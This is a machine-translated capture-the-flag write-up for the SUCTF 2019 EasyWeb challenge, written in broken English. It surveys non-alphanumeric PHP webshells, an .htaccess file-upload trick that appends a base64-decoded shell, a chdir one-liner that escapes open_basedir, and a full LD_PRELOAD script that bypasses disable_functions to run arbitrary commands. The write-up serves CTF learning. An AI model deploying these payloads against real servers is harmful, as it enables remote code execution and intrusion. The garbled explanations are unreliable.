table of Contents
Brush title record: [SUCTF 2019] EasyWeb (EasyPHP)
Recurring topic links: https://buuoj.cn/challenges
Reference Links: SUCTF-2019
2019 SUCTF Web writeup
2019 Web-SUCTF-record
One, involving knowledge points
1, non-alphanumeric shell
First posted Gangster link:
Some webshell not contain numbers and letters of
non-alphanumeric webshell articles of improving
a question or exclusive review php webshell
This aspect is full of clever but useless, I look stupefied, saying the use of php characteristics:
(1) the code characters automatically without quotes as a string
Php classic characteristics of "Use of undefined constant", the code will automatically without the quotation marks as a string of characters, beginning 7.2 proposed to be abandoned, but at the moment there are.
I guess this is why horses pass the time $_GET['cmd']
and $_GET[cmd]
can be
(2) Ascii character code will be greater than 0x7F as strings
(3) php default HTTP GET parameters in the acquisition time is to get to a string type
(. 4) the PHP in braces ({} braces) uses detailed
$str{4}
Keep after the variable string or braces {} brackets [], which fill the figures, this is treated as an array and the string variable
${_GET}{cmd}
57) the string may be a Boolean type conversion! Operator
<?php
var_dump(@a); //string(1) "a"
var_dump(!@a); //bool(false)
var_dump(!!@a); //bool(true)
(6) PHP weakly typed properties
For because 'and'} {2, 2 must be digital. PHP is due to the weak type of this feature, true value of 1, it is true + true == 2, i.e. ( '>'> '<') + ( '>'> '<') == 2
(7) a-zA-Z using the self-energizing become the next letter
'a'++ => 'b'
,'b'++ => 'c'
2, using the .htaccess file upload
When <?
the time is filtered pseudo bypassing protocol, file upload base64 encoded upload
AddType application/x-httpd-php .wuwu
php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.wuwu"
3, several methods to bypass open_basedir / disable_function of
(1) chdir bypass
The new method of bypass open_basedir
by chdir to bypass open_basedir
chdir('xxx');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));
(2) bypassing the link files
php5 full version of the script file to bypass open_basedir reading
higher this question in php version, this does not work
(3) disable_function bypass - using LD_PRELOAD
Very powerful thing, I look silly all
without having to sendmail: Using LD_PRELOAD breakthrough disable_functions
disable_function bypass - use LD_PRELOAD
bypass_disablefunc_via_LD_PRELOAD
Conditions: PHP support putenv () function is used and the following
Paste key scripts
<?php
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
//error_log("err",1,"","");
//$img = Imagick("1.mp4");//如果有ImageMagick这个扩展(文件必须存在)
//imap_mail("","","");//需要安装imap拓展
//mb_send_mail("","","");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);
?>
(4) fpm bypass
It has not solved the problem, and then more free